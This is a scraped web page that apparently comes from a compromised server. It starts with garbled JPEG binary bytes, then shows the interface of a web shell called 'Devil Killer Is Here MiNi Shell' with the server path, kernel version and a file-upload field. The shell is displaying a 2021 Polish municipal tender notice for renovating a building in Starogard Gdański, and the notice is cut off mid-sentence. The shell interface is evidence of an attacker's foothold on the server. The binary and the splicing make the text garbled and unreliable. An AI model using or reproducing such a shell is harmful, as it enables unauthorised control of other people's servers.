JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210609/0007708001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00077080 z dnia 2021-06-09</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Rewitalizacja Śródmieścia Starogardu Gdańskiego” – roboty remontowo-budowlane w budynku mieszkalnym wielorodzinnym przy ul. Jagiełły 14 wraz z zagospodarowaniem terenu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MIEJSKA STAROGARD GDAŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675652</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Gdańska 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Starogard Gdański</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">www.ratusz@um.starogard.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.starogard.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Rewitalizacja Śródmieścia Starogardu Gdańskiego” – roboty remontowo-budowlane w budynku mieszkalnym wielorodzinnym przy ul. Jagiełły 14 wraz z zagospodarowaniem terenu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6c6afec9-c77e-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00077080</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000874/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Rewitalizacja Śródmieścia Starogardu Gdańskiego-Modernizacja budynków komunalnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Rewitalizacja Śródmieścia Starogardu Gdańskiego” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> platformazakupowa.pl/starogard_gdanski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl/starogard_gdanski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl pod adresem: www.platformazakupowa.pl/starogard_gdanski.<br/>2. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę<br/>ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij<br/>wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do<br/>zamawiającego.<br/>3. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie<br/>w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl do konkretnego wykonawcy.<br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości<br/>bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień<br/>może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0.;<br/>d) włączona obsługa JavaScript;<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie<br/>UTF8;<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na<br/>stronie internetowej pod linkiem w zakładce „Regulamin" oraz uznaje go za wiążący;<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją<br/>korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z<br/>treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość<br/>do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie<br/>będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek<br/>narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem państwa danych osobowych<br/>przetwarzanych w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego<br/>będzie Gmina Miejska Starogard Gdański, ul. Gdańska 6, 83-200 Starogard Gdański. 2.<br/>Wyznaczyliśmy inspektora ochrony danych. Jest to osoba, z którą mogą się Państwo kontaktować we<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw<br/>związanych z przetwarzaniem danych. Z inspektorem ochrony danych mogą się Państwo<br/>kontaktować: 1) telefonicznie: 58 530 6059, 2) elektronicznie: iod@um.starogard.pl. 3. Państwa dane<br/>będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>Podstawą prawną ich przetwarzania jest Państwa zgoda wyrażona poprzez akt uczestnictwa w<br/>postępowaniu oraz następujące przepisy prawa: 1) ustawa z dnia 11 września 2019 roku Prawo<br/>zamówień publicznych; 2) ustawa o narodowym zasobie archiwalnym i archiwach. 4. Państwa dane<br/>pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przetwarzane będą<br/>przez okres 5 lat. 5. Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia<br/>publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do<br/>zasady postępowanie o udzielenie zamówienia publicznego jest jawne. Ograniczenie dostępu do<br/>Państwa danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach jeśli jest<br/>to uzasadnione ochroną prywatności zgodnie z art. 8 ust 4 pkt 1 i 2 ustawy z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych. Ponadto odbiorcą danych zawartych w dokumentach związanych<br/>z postępowaniem o za mówienie publiczne mogą być podmioty z którymi Administrator danych zawarł<br/>umowy lub porozumienie na korzystanie z udostępnianych przez nie systemów informatycznych<br/>w zakresie przekazywania lub archiwizacji danych. Zakres przekazania danych tym odbiorcom<br/>ograniczony jest jednak wyłącznie do możliwości zapoznania się z tymi danymi w związku ze<br/>świadczeniem usług wsparcia technicznego i usuwaniem awarii. Odbiorców tych obowiązuje klauzula<br/>zachowania poufności pozyskanych w takich okolicznościach wszelkich danych, w tym danych<br/>osobowych. 6. W związku z jawnością postępowania o udzielenie zamówienia publicznego Państwa<br/>dane mogą być przekazywane do państw z poza EOG z zastrzeżeniem, o którym mowa w ustępie 5.<br/>7. W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie<br/>zamówienia publicznego przysługują Państwu następujące uprawnienia: 1) prawo dostępu do swoich danych oraz otrzymania ich kopii; 2) prawo do sprostowania (poprawiania) swoich danych; 3) prawo do<br/>usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania<br/>się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej; 4)<br/>prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość<br/>skorzystania z tego praw, 5) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych. 8. Podanie danych osobowych w związku udziałem w postępowaniu o zamówienia<br/>publiczne nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału.<br/>Wynika to stąd, że w zależności od przedmiotu zamówienia, zamawiający może żądać ich podania na<br/>podstawie przepisów ustawy Prawo zamówień publicznych oraz wydanych do niej przepisów<br/>wykonawczych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RKiZP 271.20.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja inwestycji w trybie zaprojektuj i wybuduj polegającej na opracowaniu kompletnej dokumentacji projektowej oraz wykonaniu na jej podstawie robót remontowo-budowlanych w budynku mieszkalnym wielorodzinnym przy ul. Jagiełły 14 (jednostka geodezyjna miasto Starogard Gdański, obręb geodezyjny obręb geodezyjny 17, dz. nr 36/6), w ramach zadania inwestycyjnego o nazwie: „Rewitalizacja Śródmieścia Starogardu Gdańskiego”.<br/> 2. Opracowanie kompletnej dokumentacji projektowej obejmuje:<br/> 1) wykonanie dokumentacji projektowej w zakresie wymaganym do „zgłoszenia wykonania robót budowlanych” Staroście Starogardzkiemu i przekazanie jej również Zamawiającemu w wersji papierowej 2 egz. i elektronicznej;<br/> 2) dokonanie „zgłoszenia wykonania robót budowlanych” Staroście Starogardzkiemu w imieniu Zamawiającego oraz uzyskanie Zaświadczenia o braku sprzeciwu na zgłaszane roboty oraz wszystkich uzgodnień i pozwoleń wymaganych prawem;<br/> 3) wykonanie Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych;<br/> 4) dokumentacja projektowa musi być zgodna z wymaganiami Zamawiającego dla przedmiotowego zamówienia, zawartymi w programie funkcjonalno-użytkowym (PFU) i pozostałymi dokumentami min. umową, obowiązującymi przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane, a także zgodna z wszelkimi aktami prawnymi właściwymi w przedmiocie zamówienia, z przepisami techniczno-budowlanymi, obowiązującymi na terenie kraju normami, wytycznymi oraz zasadami wiedzy technicznej;<br/> 5) projektowane przegrody termomodernizacyjne (ściany zewnętrzne, dach, stolarka zewnętrzna) muszą spełniać wymogi zawarte w Rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2015 r. poz. 1422 z późn. zm.), obowiązujących od 31 grudnia 2020 roku., <br/> 6) zalecana wizja lokalna w terenie przed przystąpieniem do prac projektowych.<br/> 3. Zakres robót budowlanych:<br/> 1) REMONT ELEWACJI, Z OCIEPLENIEM:<br/> a) wymiana luźnego tynku;<br/> b) przetarcie naprawa istniejącego tynku;<br/> c) ocieplenie ścian budynku płytami styropianowymi wraz z wyprawą elewacyjną;<br/> d) wymiana parapetów z blachy powlekanej;<br/> e) wymiana stolarki okiennej i drzwiowej na klatce schodowej;<br/> f) malowanie stolarki zewnętrznej;<br/> g) montaż tabliczki adresowej;<br/> h) wykonanie opaski z kostki betonowej wokół budynku z wymianą studzienek piwnicznych na systemowe; <br/> i) wywóz i utylizacja gruzu i materiałów rozbiórkowych.<br/> 2) REMONT DACHU I KOMINÓW:<br/> a) wymiana pokrycia z papy na podłożu z desek na pokrycie papą zgrzewalną wraz z dociepleniem styropianem jednostronnie oklejonym papą;<br/> b) wymiana obróbek blacharskich, rynien i rur spustowych, z blachy ocynkowanej na blachę powlekaną, wraz z uchwytami rynnowymi i rurowymi;<br/> c) przemurowanie kominów z cegły klinkierowej wraz z montażem nowych nakryw betonowych;<br/> d) wymiana zniszczonych i skorodowanych elementów konstrukcyjnych dachu;<br/> e) odgrzybienie i wymiana części deskowania;<br/> f) wymiana wyłazu dachowego;<br/> g) oczyszczenie i impregnacja (malowanie) okapu od spodu (deski, końcówki krokwi);<br/> h) wywóz i utylizacja gruzu i materiałów rozbiórkowych.<br/> 4. Na etapie realizacji robót budowlanych należy wykonać: <br/> 1) przejęcie od zamawiającego placu budowy;<br/> 2) zapewnienie geodezyjnego wytyczenia robót i pełnej obsługi geodezyjnej;<br/> 3) zapewnienie kierownictwa budowy w zakresie niezbędnych branż przez osoby posiadające wymagane uprawnienia budowlane;<br/> 4) wykonanie robót budowlanych na podstawie opracowanej i zatwierdzonej dokumentacji projektowej zgodnie z obowiązującym prawem, normami, zasadami wiedzy technicznej i Specyfikacją Warunków Zamówienia;<br/> 5) dostawę i montaż elementów małej architektury;<br/> 6) wykonanie robót pomocniczych, przygotowawczych i porządkowych oraz zagospodarowanie terenu wraz z naprawą ewentualnych uszkodzeń;<br/> 7) prowadzenie dokumentacji budowy oraz wykonanie niezbędnych pomiarów, badań i sprawdzeń;<br/> 8) przygotowanie i przedłożenie dokumentacji powykonawczej, zawierającej dokumentację z pomiarami geodezyjnymi (jeżeli jej wykonanie będzie konieczne) oraz operatem zawierającym zestawienie min. atestów wbudowanych materiałów, obiektów i urządzeń, itp. wykonawca zobowiązany jest przedłożyć dokumentacje powykonawczą i instrukcje użytkowania w języku polskim;<br/> 9) wykonanie innych prac wynikających z programu funkcjonalno-użytkowego, uzgodnień opracowywanej dokumentacji projektowej, sztuki budowlanej i obowiązujących przepisów: <br/> 10) wywóz i utylizacja materiałów z rozbiórki, zgodnie z ustawą o odpadach;<br/> 11) przy wykonywaniu robót należy stosować wyroby dopuszczone do obrotu stosowania w budownictwie zgodnie z ustawą z dnia 7 lipca 1994r. Prawo Budowlane;<br/> 12) wykonawca zapewni we własnym zakresie wszelkie materiały niezbędne do zamontowania urządzeń zgodnie z ich instrukcją montażu;<br/> 13) wykonawca na każde żądanie Zamawiającego /inspektora nadzoru/ zobowiązany jest okazać w stosunku do wskazanych materiałów certyfikat na znak bezpieczeństwa, deklaracje zgodności lub certyfikat zgodności z Polską Normą lub aprobatą techniczną;<br/> 14) zamawiający informuje również, iż wykonawcy nakazuje się zabezpieczyć plac budowy przed dostępem osób trzecich, a także zapewnić warunki bezpieczeństwa i p.poż. określone w przepisach szczególnych, utrzymywać ład i porządek w trakcie robót, oraz uporządkować po ukończeniu robót;<br/> 15) wykonanie i montaż 1 tablicy pamiątkowej o współfinansowaniu inwestycji z środków unijnych na obszarze realizowanej inwestycji po uprzednim uzgodnieniu lokalizacji tablic z zamawiającym.Załączony do SWZ program funkcjonalno-użytkowy stanowi wytyczne do projektowania, w związku z czym dopuszcza się dokonywanie w fazie projektowania niezbędnych zmian PFU proponowanych przez wykonawcę, jedynie po uzyskaniu akceptacji zamawiającego. Służy również do ustalenia planowanych kosztów prac projektowych i robót budowlanych i przygotowania oferty. Wszelkie odstępstwa od programu funkcjonalno-użytkowego nie będą wpływać na wartość niniejszego zamówienia publicznego. Przy opracowaniu oferty należy ująć i wycenić wszystkie inne czynności niezbędne, zdaniem Wykonawcy, do prawidłowego zaprojektowania, wykonania i eksploatacji przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">112 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2. Na podstawie art. 112 Ustawy, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie; <br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie; <br/> 3) sytuacji ekonomicznej lub finansowej: <br/> Dla wykazania spełniania warunku wymagane jest posiadanie środków finansowych lub zdolności kredytowej w wysokości co najmniej 30.000,00 zł. W przypadku oferty wspólnej wykonawców warunek można spełnić łącznie.<br/> 4) zdolności technicznej lub zawodowej:<br/> Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże, że: <br/> a) wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, dwie roboty budowlane w zakresie remontu/budowy/przebudowy budynku/ów, o wartości robót minimum 50.000 zł każda.<br/> Zgodnie z definicją wynikającą z Prawa budowlanego Zamawiający pod pojęciem budowy rozumie również odbudowę, rozbudowę, nadbudowę.<br/> W przypadku oferty wspólnej wykonawców warunek musi spełniać przynajmniej jeden z wykonawców. Jeżeli wymagane wartości robót w ramach w/w doświadczenia wyrażone będą w innej walucie niż PLN, Wykonawca dokona ich przeliczenia na 